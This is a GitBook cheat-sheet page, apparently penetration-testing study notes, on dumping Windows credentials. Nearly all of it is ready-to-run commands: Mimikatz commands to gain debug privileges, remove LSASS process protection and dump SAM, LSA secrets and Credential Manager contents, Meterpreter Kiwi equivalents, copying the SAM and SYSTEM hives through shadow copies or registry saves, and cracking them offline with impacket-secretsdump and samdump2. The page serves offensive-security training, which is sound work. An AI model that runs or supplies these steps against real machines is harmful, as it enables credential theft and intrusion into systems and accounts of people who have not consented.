All Gitbook

Windows Credentials

Password hash dump and reuse
LogoPassword Dumping Cheatsheet: WindowsHacking Articles
LogoHow to use Mimikatz for Hacking in 2025: The Definitive GuideStationX
LogoOSEP_OSED_TOOLS/OSEP_enum.ps1 at main · jayesther/OSEP_OSED_TOOLSGitHub
OSEP Enum

Local

SID in SAM

PowerShell
$env:computername
[wmi] "Win32_userAccount.Domain='',Name='Administrator'"
S-1-5-21--
whoami /user

Mimikatz

privilege::debug
token::elevate
!+
!processprotect /process:lsass.exe /remove
sekurlsa::credman
lsadump::sam
lsadump::secrets

Alternative from LSA

privilege::debug
lsadump::lsa /patch
lsadump::lsa /inject

Meterpreter Kiwi

meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > lsa_dump_sam
meterpreter > lsa_dump_secrets

Shadow Copy (admin)

1) cmd
wmic shadowcopy call create Volume='C:\'
2) cmd
vssadmin list shadows
3) cmd
copy \\? C:\users\offsec.corp1\Downloads\sam

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system

Registry (admin)

cmd
reg save HKLM\sam C:\users\offsec.corp1\Downloads\sam
reg save HKLM\system C:\users\offsec.corp1\Downloads\system

Decrypt

in Kali
impacket-secretsdump -system SYSTEM -sam SAM LOCAL
samdump2 SYSTEM SAM
python pwdump.py /home/kali/system /home/kali/sam

PreviousJust-In-Time (JIT) AccessNextLocal Administrator Password Solution (LAPS)

Last updated